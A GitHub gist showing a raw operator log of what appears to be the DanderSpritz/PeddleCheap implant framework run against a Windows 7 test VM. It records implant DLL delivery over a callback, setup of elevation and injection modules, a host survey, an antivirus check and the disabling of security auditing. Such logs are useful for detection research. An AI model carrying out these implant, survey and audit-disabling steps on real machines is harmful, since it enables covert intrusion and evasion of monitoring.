Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
[22:59:16] ID: 1125 'pc_listen' started [target: z0.0.0.1]
Waiting for connection...
Setting Sockopt
Listening on [0.0.0.0]:443.
Setting Sockopt
Listening on [0.0.0.0]:80.
Setting Sockopt
Listening on [0.0.0.0]:53.
Setting Sockopt
Listening on [0.0.0.0]:1509.
Connection received from [192.168.0.249]:49356 to [192.168.0.118]:443...
Connection accepted
Starting session...
PC LP Version: 2.3.0
LP...ready to send the MAGIC NUMBER
Sending additional 358 bytes of random
LP ...ready to receive the symmetric key
LP...ready to decrypt the key
Remote Information
PC Version : 2.3.0
PC Id : 0x0000000000000000
Arch-Os : i386-winnt (compiled i386-winnt)
Session Key : ff 05 c1 bd 97 98 b5 3c 42 8d 73 03 0c c6 0d b3
Getting remote OS information
Remote OS
Arch : i386
Compiled Arch : i386
Platform : winnt
Compiled Platform : winnt
Version : 6.1 (Windows 7)
Service Pack : 1
C Lib Version : 6.0.0
Sending OS version check status to remote side (4 bytes)
Data (OS version check status) has been sent
Data (OS version check status) has been received and stored by remote side
Ready to send implant
Successfully loaded LP DLLs
Payload
File Name : D:\DSZOPSDisk\Resources\Pc\/../Dsz/Payloads/Files/i386-winnt-vc9s/release/Dsz_Implant_Pc.dll
Send payload : true
Original Size : 248832
Send Size : 137488
Checksum : c745
Name :
Path :
Export : #1
Sending PayloadInfo run type information
Sending File/Library info to remote side (36 bytes)
Data (File/Library info) has been sent
Data (File/Library info) has been received and stored by remote side
Sending Export name to remote side (3 bytes)
Data (Export name) has been sent
Data (Export name) has been received and stored by remote side
Sending Payload to remote side (137488 bytes)
Data (Payload) has been sent
Data (Payload) has been received and stored by remote side
... Receiving Acknowledgements
Received successful status message for Dll/Exe loaded
Received successful status message for About to run payload
Received successful status message for Exit This Message Loop
Setting remote address to z0.0.0.13
Remote Address : z0.0.0.13
Architecture : i386
Compiled Architecture : i386
Platform : winnt
Version : 6.1.1 (build 7601)
C Library Version : 6.0.0
Process Id : 496
Type : Dsz
Metadata : type=PC local=192.168.0.118:443 remote=192.168.0.249:49356
- Remote host is i386-winnt (6.1.1)
- --------------------------------------------------
- Performing setup for i386-winnt on z0.0.0.13
- --------------------------------------------------
- PROMPTED - Shutdown (CURRENT)
- Registering Mcl_NtElevation options
- SUCCESS
- Setting Mcl_NtElevation Type
- EpMe_GrSa
- Registering Mcl_NtNativeApi options
- SUCCESS
- Setting Mcl_NtNativeApi Type
- WIN32
- Registering Mcl_NtMemory options
- SUCCESS
- Setting Mcl_NtMemory Type
- Std
- Registering Mcl_ThreadInject options
- SUCCESS
- Setting Mcl_ThreadInject Type
- Std
Unable to get target DB for unknown target
Able to load audit plugin, NT_ELEVATION loaded correctly, moving on
- Current process options (0xd)
- DisableThunkEmulation
- ExecutionDisabled
- Permanent
Do you want to modify the process options?
NO
- DISABLED - Authentication (CURRENT)
- --------------------------------------------------
- Getting remote time
- RETRIEVED
- Getting host information
- RETRIEVED
- Getting OS GUID information
- RETRIEVED
- Storing host information
- STORED
- User is ADMINISTRATOR
-
--------------------------------------------------
Running command 'python Connected/Connected.py -project Ops'
Unable to get target DB for unknown target
- --------------------------------------------------
- Re-registering global wrappers for current target
- --------------------------------------------------
- hide - Windows kernel 6.0+ PatchGuard protection
- packetredirect - Trigger failure alerter
- --------------------------------------------------
Showing you what we know so you can make a good decision in the menu below
crypto_guid: b2520430-4565-417f-b4e8-0668971c30f9
hostname: victim-PC
macs: [u'08-00-27-bb-ef-c8']
implant_id: 0x0000000000000000
Below match threshold or multiple matches. You must choose. Choose wisely.
0) None of these - create a new target db
1) (Confidence: 0.8) test / victim-PC / PC ID 0x0000000000000000 / b2520430-4565-417f-b4e8-0668971c30f9 / MACS: ['08-00-27-bb-ef-c8']
Enter selection:
1
- [2017-04-15 16:01:44 z0.0.0.13] Target ID completed, ID 2c37f2f0-55d8-4e56-bbcb-656b9d98c775 (in project test)
- [2017-04-15 16:01:44 z0.0.0.13] You have been on this target previously with the following CP addresses
z0.0.0.12
z0.0.0.11
====================================================================
- [2017-04-15 16:01:44 z0.0.0.13] Showing ifconfig data so you can make sure you are on the correct target
FQDN: victim-PC
DNS Servers: 195.130.131.1, 195.130.130.1
- [2017-04-15 16:01:45 z0.0.0.13] Showing all non-local and non-tunnel encapsulation adapter information, see command 1206 for full interface list
| Description | MAC | IP | Netmask | Gateway | DHCP Server | Name |
+--------------------------------------+-------------------+---------------+---------------+---------------------------------+-------------+----------------------------------------------------------------+
| Intel(R) PRO/1000 MT Desktop Adapter | 08-00-27-BB-EF-C8 | 192.168.0.249 | 255.255.255.0 | fe80::de53:7cff:fef2:b96e%%%%11 | 192.168.0.1 | Local Area Connection ({C63B0135-2C21-412E-92E7-A6FEB149081E}) |
Running command 'survey -run D:\DSZOPSDisk\Resources\Ops\Data\survey.xml -sections env-setup -quiet'
Running command 'systemversion '
Architecture : i386
OS Family : winnt
Version : 6.1 (Build 7601)
Platform : Windows 7
Service Pack : 1.0
Extra Info : Service Pack 1
Product Type : Workstation / Professional
Terminal Services is installed, but only one interactive session is supported.
Command completed successfully
- [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for AUDIT
- [2017-04-15 16:01:48 z0.0.0.13] 1 safety handler registered for DRIVERS
- [2017-04-15 16:01:48 z0.0.0.13] Loaded safety handlers from previous op(s)
Command completed successfully
Running command 'survey -run'
- [2017-04-15 16:01:50 z0.0.0.13] ================================== Process list ==================================================================
- [2017-04-15 16:01:52 z0.0.0.13] Data age: 01 seconds - data is fresh
- | PID | PPID | Full Path | User | Comment |
- +------+------+--------------------------------------------------+------------------------------+------------------------------------------------------------+
- | 0 | 0 | | | |
- | 4 | 0 | System | | System Kernel |
- | 232 | 4 | ---\SystemRoot\System32\smss.exe | NT AUTHORITY\SYSTEM | Session Manager Subsystem |
- | 300 | 292 | csrss.exe | | Client-Server Runtime Server Subsystem |
- | 336 | 292 | C:\Windows\system32\wininit.exe | NT AUTHORITY\SYSTEM | Vista background service launcher |
- | 428 | 336 | ---C:\Windows\system32\services.exe | NT AUTHORITY\SYSTEM | Windows Service Controller |
- | 536 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 616 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 688 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 760 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 248 | 760 | ---------C:\Windows\system32\Dwm.exe | victim-PC\victim | Vista Desktop Window Manager |
- | 796 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 3772 | 796 | ---------C:\Windows\system32\wuauclt.exe | victim-PC\victim | Microsoft Windows Update |
- | 968 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1096 | 428 | ------svchost.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1236 | 428 | ------spoolsv.exe | NT AUTHORITY\SYSTEM | Microsoft Printer Spooler Service |
- | 1264 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 1368 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 276 | 428 | ------C:\Windows\system32\taskhost.exe | victim-PC\victim | Windows 7 Generic Host Process |
- | 2032 | 428 | ------SearchIndexer.exe | NT AUTHORITY\SYSTEM | Microsoft search indexer |
- | 1152 | 428 | ------wmpnetwk.exe | NT AUTHORITY\NETWORK SERVICE | Windows Media Player Network Sharing Service |
- | 2132 | 428 | ------svchost.exe | NT AUTHORITY\LOCAL SERVICE | Microsoft Service Host Process (Check path in processdeep) |
- | 3296 | 428 | ------C:\Program Files\EMET 5.5\EMET_Service.exe | NT AUTHORITY\SYSTEM | |
- | 3424 | 428 | ------sppsvc.exe | NT AUTHORITY\NETWORK SERVICE | Microsoft Software Protection Platform Service |
- | 3456 | 428 | ------svchost.exe | NT AUTHORITY\SYSTEM | Microsoft Service Host Process (Check path in processdeep) |
- | 440 | 336 | ---C:\Windows\system32\lsass.exe | NT AUTHORITY\SYSTEM | Local Security Authority Server Subsystem |
- | 448 | 336 | ---C:\Windows\system32\lsm.exe | NT AUTHORITY\SYSTEM | Vista Local Session Manager |
- | 344 | 328 | csrss.exe | | Client-Server Runtime Server Subsystem |
- | 2448 | 344 | ---C:\Windows\system32\conhost.exe | victim-PC\victim | Microsoft Console Windows Host |
- | 372 | 328 | C:\Windows\system32\winlogon.exe | NT AUTHORITY\SYSTEM | Microsoft Windows Logon Process |
- | 496 | 100 | C:\Windows\Explorer.EXE | victim-PC\victim | Windows Explorer Shell |
- | 296 | 496 | ---C:\Windows\system32\cmd.exe | victim-PC\victim | +++ Windows Command Prompt +++ |
- | 2768 | 496 | ---C:\Windows\system32\taskmgr.exe | victim-PC\victim | +++ Windows Task Manager +++ |
background python monitorwrap.py -args "-g -t OPS_PROCESS_MONITOR_TAG -i 5 -s \"processes -monitor \" "
- [2017-04-15 16:01:53 z0.0.0.13] ===================================== Uptime =====================================================================
Uptime: -1 days, 10:11:53
- [2017-04-15 16:01:54 z0.0.0.13] ================== Auditing status check, dorking will be later ==================================================
- [2017-04-15 16:01:54 z0.0.0.13] Data age: 24:58 (from local cache, re-run manually if you need to)
- [2017-04-15 16:01:54 z0.0.0.13] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
- [2017-04-15 16:01:54 z0.0.0.13] The above is only being shown for informational purposes, you will be prompted about dorking later
- [2017-04-15 16:01:54 z0.0.0.13] =================================== Driver list ===================================================================
Running command 'python D:\DSZOPSDisk\Resources\Ops\PyScripts\driverlist.py -project Ops -args "-nofreshscan"'
- | Driver | Path | Flags | Comment | Type | First Seen | Also On |
- +------------------+-----------------------------+----------------+----------------------------------+---------+------------+------------+
- | dump_dumpata.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
- | dump_dumpfve.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
- | dump_msahci.sys | C:\Windows\system32\drivers | RANDOM,NO_HASH | !!! POSSIBLE driver mem dump !!! | WARNING | 2017-04-15 | unknown-PC |
Command completed successfully
- [2017-04-15 16:01:58 z0.0.0.13] =============================== Installed software ===============================================================
- --------------------------------------------------------------- Installer Packages ---------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:50 (from local cache, re-run manually if you need to)
| Arcitecture | Name | Description | Installed version | Date installed |
+-------------+------------------------------+-----------------------+-------------------+----------------+
| 32-bit | EMET 5.5 | Microsoft Corporation | 5.5 | 2017-04-15 |
| 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | |
| 32-bit | Microsoft .NET Framework 4.5 | Microsoft Corporation | 4.5.50709 | 2017-04-15 |
- ----------------------------------------------------------------- Software key(s) -----------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:44 (from local cache, re-run manually if you need to)
| Architecture | Name | Last update |
+--------------+------------------------+-------------+
| 32-bit | ATI Technologies | 2009-07-14 |
| 32-bit | CBSTEST | 2017-04-15 |
| 32-bit | Classes | 2017-04-16 |
| 32-bit | Clients | 2009-07-14 |
| 32-bit | Intel | 2009-07-14 |
| 32-bit | Microsoft | 2017-04-16 |
| 32-bit | ODBC | 2009-07-14 |
| 32-bit | Policies | 2009-07-14 |
| 32-bit | RegisteredApplications | 2011-04-12 |
| 32-bit | RT 7 Lite | 2014-04-19 |
| 32-bit | Sonic | 2011-04-12 |
| 32-bit | WOW6432Node | 2017-04-15 |
- -------------------------------------------------------------- Program files dir(s) --------------------------------------------------------------
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:40 (from local cache, re-run manually if you need to)
| Architecture | Folder Name | Modified |
+--------------+--------------------------+-------------------------------+
| 32-bit | Common Files | 2009-07-14T02:37:05.485289900 |
| 32-bit | DVD Maker | 2011-04-12T02:24:27.829375000 |
| 32-bit | EMET 5.5 | 2017-04-16T03:24:44.011648000 |
| 32-bit | Internet Explorer | 2011-04-12T02:16:02.751250000 |
| 32-bit | Microsoft Games | 2011-04-12T02:24:27.032500000 |
| 32-bit | Microsoft.NET | 2017-04-16T03:22:03.169296000 |
| 32-bit | MSBuild | 2009-07-14T04:52:30.938524700 |
| 32-bit | Reference Assemblies | 2009-07-14T04:52:30.938524700 |
| 32-bit | Uninstall Information | 2009-07-14T04:53:23.912062200 |
| 32-bit | Windows Defender | 2011-04-12T02:16:02.720000000 |
| 32-bit | Windows Journal | 2011-04-12T02:24:24.860625000 |
| 32-bit | Windows Mail | 2011-04-12T02:16:02.751250000 |
| 32-bit | Windows Media Player | 2011-04-12T02:16:02.735625000 |
| 32-bit | Windows NT | 2009-07-14T04:52:30.954124700 |
| 32-bit | Windows Photo Viewer | 2011-04-12T02:16:02.735625000 |
| 32-bit | Windows Portable Devices | 2010-11-20T21:33:48.579615600 |
| 32-bit | Windows Sidebar | 2011-04-12T02:16:02.782500000 |
z0.0.0.13: [2017-04-15 16:01:58] Hashhunter completed on victim-PC!
- [2017-04-15 16:01:58 z0.0.0.13] ================================ Running services ================================================================
- [2017-04-15 16:01:58 z0.0.0.13] Data age: 24:38 (from local cache, re-run manually if you need to)
| Display name | Service name |
+--------------------------------------------------+----------------------+
| Application Experience | AeLookupSvc |
| Application Information | Appinfo |
| Windows Audio Endpoint Builder | AudioEndpointBuilder |
| Windows Audio | Audiosrv |
| Base Filtering Engine | BFE |
| Background Intelligent Transfer Service | BITS |
| Computer Browser | Browser |
| Certificate Propagation | CertPropSvc |
| Cryptographic Services | CryptSvc |
| Offline Files | CscService |
| DCOM Server Process Launcher | DcomLaunch |
| DHCP Client | Dhcp |
| DNS Client | Dnscache |
| Diagnostic Policy Service | DPS |
| Microsoft EMET Service | EMET_Service |
| Windows Event Log | eventlog |
| COM+ Event System | EventSystem |
| Function Discovery Provider Host | fdPHost |
| Function Discovery Resource Publication | FDResPub |
| Windows Font Cache Service | FontCache |
| Group Policy Client | gpsvc |
| HomeGroup Listener | HomeGroupListener |
| HomeGroup Provider | HomeGroupProvider |
| IP Helper | iphlpsvc |
| CNG Key Isolation | KeyIso |
| Server | LanmanServer |
| Workstation | LanmanWorkstation |
| TCP/IP NetBIOS Helper | lmhosts |
| Windows Firewall | MpsSvc |
| Network Connections | Netman |
| Network List Service | netprofm |
| Network Location Awareness | NlaSvc |
| Network Store Interface Service | nsi |
| Peer Networking Identity Manager | p2pimsvc |
| Peer Networking Grouping | p2psvc |
| Plug and Play | PlugPlay |
| Peer Name Resolution Protocol | PNRPsvc |
| Power | Power |
| User Profile Service | ProfSvc |
| RPC Endpoint Mapper | RpcEptMapper |
| Remote Procedure Call (RPC) | RpcSs |
| Security Accounts Manager | SamSs |
| Task Scheduler | Schedule |
| Secondary Logon | seclogon |
| System Event Notification Service | SENS |
| Remote Desktop Configuration | SessionEnv |
| Shell Hardware Detection | ShellHWDetection |
| Print Spooler | Spooler |
| Software Protection | sppsvc |
| SPP Notification Service | sppuinotify |
| SSDP Discovery | SSDPSRV |
| Remote Desktop Services | TermService |
| Themes | Themes |
| Distributed Link Tracking Client | TrkWks |
| Remote Desktop Services UserMode Port Redirector | UmRdpService |
| UPnP Device Host | upnphost |
| Desktop Window Manager Session Manager | UxSms |
| Diagnostic Service Host | WdiServiceHost |
| Windows Defender | WinDefend |
| Windows Management Instrumentation | Winmgmt |
| Windows Media Player Network Sharing Service | WMPNetworkSvc |
| Security Center | wscsvc |
| Windows Search | WSearch |
| Windows Update | wuauserv |
- [2017-04-15 16:01:59 z0.0.0.13] =================================== AV Check!!! ===================================================================
Running command 'python windows\checkpsp.py -project Ops '
- Checking for any running known PSP's...
- microsoft
-
- Checking for target PSP history...
- Found configuration history for Microsoft.
- Saw PSP's we can act on. Running scripts.
- ============================================
- = microsoft =
- ============================================
- Checking for a change in configuration
- The following PSPs had NO changes:
- Microsoft Windows Defender Windows 7 Ultimate
- +--------------------+--------------------+
- | | Setting Value |
- +--------------------+--------------------+
- | vendor | Microsoft |
- | product | Windows Defender |
- | version | Windows 7 Ultimate |
- | Definition Updates | None |
- | Information | None |
- | Install Date | None |
- | Log File | None |
- | Quarantine | None |
- | ServiceStart | 2 |
- | Software | PSP |
- | SpyNet | 1 |
- | Status | Enabled |
- +--------------------+--------------------+
Command completed successfully
- [2017-04-15 16:02:11 z0.0.0.13] ================================ Auditing dorking ================================================================
- [2017-04-15 16:02:11 z0.0.0.13] Data age: 25:15 (from local cache, re-run manually if you need to)
- [2017-04-15 16:02:11 z0.0.0.13] Auditing is enabled on this machine
| Category | Success | Failure |
+-----------------------------------+---------+---------+
| System_SecurityStateChange | True | False |
| System_Integrity | True | True |
| System_Others | True | True |
| Logon_Logon | True | False |
| Logon_Logoff | True | False |
| Logon_AccountLockout | True | False |
| Logon_SpecialLogon | True | False |
| Logon_NPS | True | True |
| PolicyChange_AuditPolicy | True | False |
| PolicyChange_AuthenticationPolicy | True | False |
| AccountManagement_UserAccount | True | False |
| AccountManagement_SecurityGroup | True | False |
Do you want to dork security auditing?
YES
- [2017-04-15 16:02:23 z0.0.0.13] Security auditing dorked, do not stop command 1237 or you will lose your blessing
- [2017-04-15 16:02:23 z0.0.0.13] ==================================== Monitors ====================================================================
Monitors
-----------------------------
1) Full - arp, netstat, activity
2) Netstat and activity
3) Activity only
4) Done
Select your monitors (full recommended for most situations): [1] 4
- [2017-04-15 16:02:32 z0.0.0.13] Process deep started in the background as command ID 1239.
- [2017-04-15 16:02:32 z0.0.0.13] Informational SIG check started in the background as command ID 1240.
- [2017-04-15 16:02:32 z0.0.0.13] ================================ Scheduler survey ================================================================
- [2017-04-15 16:02:34 z0.0.0.13] Data age: 24:46 (from local cache, re-run manually if you need to)
| source | command | nextrun | triggers | runas | jobname |
+---------+------------------------------------------------------------------------------------------------------------------------+-----------------------------------------------+-----------------------------------------------+-----------------------+------------------------------------------------------------------------------------------------------+
| SERVICE | COM job ClassID and data: {BF5CB148-7C77-4D8A-A53E-D81C70CF743C} - | LOGON | LOGON | LEAST | Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual) |
| SERVICE | aitagent (runs in "") | DAILY 2007-10-08T02:30:00 | DAILY 2007-10-08T02:30:00 | SYSTEM LEAST | Application Experience\AitAgent |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe aepdu.dll,AePduRunUpdate (runs in "") | DAILY 2007-10-08T00:30:00 | DAILY 2007-10-08T00:30:00 | SYSTEM LEAST | Application Experience\ProgramDataUpdater |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations (runs in "") | BOOT | BOOT | LOCAL SERVICE LEAST | Autochk\Proxy |
| SERVICE | BthUdTask.exe $(Arg0) (runs in "") | | | SYSTEM LEAST | Bluetooth\UninstallDeviceTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - SYSTEM | EVENT , REGISTRATION , BOOT | EVENT , REGISTRATION , BOOT | SYSTEM LEAST | CertificateServicesClient\SystemTask |
| SERVICE | COM job ClassID and data: {58FB76B9-AC85-4E55-AC04-427593B1D060} - USER | EVENT , REGISTRATION , LOGON | EVENT , REGISTRATION , LOGON | LEAST | CertificateServicesClient\UserTask |
| SERVICE | %%%%SystemRoot%%%%\System32\wsqmcons.exe (runs in "") | TIME 2004-01-02T00:00:00 | TIME 2004-01-02T00:00:00 | SYSTEM LEAST | Customer Experience Improvement Program\Consolidator |
| SERVICE | COM job ClassID and data: {E7ED314F-2816-4C26-AEB5-54A34D02404C} - | WEEKLY 2008-09-01T03:30:00 | WEEKLY 2008-09-01T03:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\KernelCeipTask |
| SERVICE | COM job ClassID and data: {C27F6B1D-FE0B-45E4-9257-38799FA69BC8} - SYSTEM | DAILY 2008-04-25T01:30:00 | DAILY 2008-04-25T01:30:00 | LOCAL SERVICE LEAST | Customer Experience Improvement Program\UsbCeip |
| SERVICE | %%%%windir%%%%\system32\defrag.exe -c (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | SYSTEM HIGHEST | Defrag\ScheduledDefrag |
| SERVICE | COM job ClassID and data: {C1F85EF8-BCC2-4606-BB39-70C523715EB3} - | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | HIGHEST | Diagnosis\Scheduled |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART (runs in "") | WEEKLY 2004-01-01T01:00:00 | WEEKLY 2004-01-01T01:00:00 | SYSTEM LEAST | DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector |
| SERVICE | %%%%windir%%%%\System32\LocationNotifications.exe (runs in "") | EVENT | EVENT | LEAST | Location\Notifications |
| SERVICE | COM job ClassID and data: {A9A33436-678B-4C9C-A211-7CC38785E79D} - | WEEKLY 2008-01-01T01:00:00 | WEEKLY 2008-01-01T01:00:00 | HIGHEST | Maintenance\WinSAT |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoActivateWindowsSearch (runs in "") | | | SYSTEM LEAST | Media Center\ActivateWindowsSearch |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService (runs in "") | | | SYSTEM LEAST | Media Center\ConfigureInternetTimeService |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\DispatchRecoveryTasks |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DRMInit (runs in "") | | | LOCAL SERVICE LEAST | Media Center\ehDRMInit |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\InstallPlayReady |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate $(Arg0) (runs in "") | | | NETWORK SERVICE LEAST | Media Center\mcupdate |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -MediaCenterRecoveryTask (runs in "") | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
| SERVICE | COM job ClassID and data: {23E5D772-327A-42F5-BDEE-C65C6796BB2A} - $(Arg1) | | | SYSTEM LEAST | Media Center\MediaCenterRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -ObjectStoreRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
| SERVICE | COM job ClassID and data: {177AFECE-9599-46CF-90D7-68EC9EEB27B4} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\ObjectStoreRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURActivate (runs in "") | | | SYSTEM LEAST | Media Center\OCURActivate |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\OCURDiscovery |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscovery |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW1 |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery (runs in "") | | | SYSTEM LEAST | Media Center\PBDADiscoveryW2 |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
| SERVICE | COM job ClassID and data: {7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -PvrSchedule (runs in "") | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
| SERVICE | COM job ClassID and data: {CEF51277-5358-477B-858C-4E14F0C80BF7} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\PvrScheduleTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\RegisterSearch |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoReindexSearchRoot (runs in "") | | | SYSTEM LEAST | Media Center\ReindexSearchRoot |
| SERVICE | %%%%SystemRoot%%%%\ehome\mcupdate.exe -SqlLiteRecoveryTask (runs in "") | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
| SERVICE | COM job ClassID and data: {59116E30-02BD-4B84-BA1E-5D77E809B1A2} - $(Arg1) | | | NETWORK SERVICE LEAST | Media Center\SqlLiteRecoveryTask |
| SERVICE | %%%%SystemRoot%%%%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0) (runs in "") | | | SYSTEM LEAST | Media Center\UpdateRecordPath |
| SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - PageNotZero | EVENT | EVENT | LEAST | MemoryDiagnostic\CorruptionDetector |
| SERVICE | COM job ClassID and data: {190BA3F6-0205-4F46-B589-95C6822899D2} - Decompression | EVENT | EVENT | LEAST | MemoryDiagnostic\DecompressionFailureDetector |
| SERVICE | COM job ClassID and data: {06DA0625-9701-43DA-BFD7-FBEEA2180A1E} - | LOGON | LOGON | LEAST | MobilePC\HotStart |
| SERVICE | %%%%windir%%%%\system32\lpremove.exe (runs in "") | BOOT | BOOT | SYSTEM HIGHEST | MUI\LPRemove |
| SERVICE | COM job ClassID and data: {2DEA658F-54C1-4227-AF9B-260AB5FC3543} - | LOGON | LOGON | LEAST | Multimedia\SystemSoundsService |
| SERVICE | %%%%windir%%%%\system32\gatherNetworkInfo.vbs (runs in "$(Arg1)") | | | HIGHEST | NetTrace\GatherNetworkInfo |
| SERVICE | %%%%SystemRoot%%%%\System32\powercfg.exe -energy -auto (runs in "") | DAILY 2008-01-01T06:00:00 | DAILY 2008-01-01T06:00:00 | SYSTEM LEAST | Power Efficiency Diagnostics\AnalyzeSystem |
| SERVICE | COM job ClassID and data: {42060D27-CA53-41F5-96E4-B1E8169308A6} - $(Arg0) | EVENT , TIME 2008-03-31T00:00:00Z | EVENT , TIME 2008-03-31T00:00:00Z | LOCAL SERVICE LEAST | RAC\RacTask |
| SERVICE | COM job ClassID and data: {C463A0FC-794F-4FDF-9201-01938CEACAFA} - | EVENT | EVENT | LOCAL SERVICE LEAST | Ras\MobilityManager |
| SERVICE | COM job ClassID and data: {CA767AA8-9157-4604-B64B-40747123D5F2} - | DAILY 2008-01-01T00:00:00 | DAILY 2008-01-01T00:00:00 | SYSTEM LEAST | Registry\RegIdleBackup |
| SERVICE | %%%%windir%%%%\system32\RAServer.exe /offerraupdate (runs in "%%%%windir%%%%") | EVENT , REGISTRATION | EVENT , REGISTRATION | SYSTEM HIGHEST | RemoteAssistance\RemoteAssistanceTask |
| SERVICE | COM job ClassID and data: {FF87090D-4A9A-4F47-879B-29A80C355D61} - $(Arg0) | LOGON | LOGON | LEAST | SideShow\GadgetManager |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation (runs in "") | DAILY 2005-06-14T00:00:00 , BOOT | DAILY 2005-06-14T00:00:00 , BOOT | SYSTEM LEAST | SystemRestore\SR |
| SERVICE | COM job ClassID and data: {855FEC53-D2E4-4999-9E87-3414E9CF0FF4} - $(Arg0) | | | LEAST | Task Manager\Interactive |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem (runs in "") | EVENT | EVENT | HIGHEST | Tcpip\IpAddressConflict1 |
| SERVICE | %%%%windir%%%%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem (runs in "") | EVENT 2006-02-23T16:27:43 | EVENT 2006-02-23T16:27:43 | HIGHEST | Tcpip\IpAddressConflict2 |
| SERVICE | COM job ClassID and data: {01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} - | LOGON | LOGON | LEAST | TextServicesFramework\MsCtfMonitor |
| SERVICE | %%%%windir%%%%\system32\sc.exe start w32time task_started (runs in "") | WEEKLY 2005-01-01T01:00:00 | WEEKLY 2005-01-01T01:00:00 | LOCAL SERVICE HIGHEST | Time Synchronization\SynchronizeTime |
| SERVICE | sc.exe config upnphost start= auto (runs in "") | | | SYSTEM LEAST | UPnP\UPnPHostConfig |
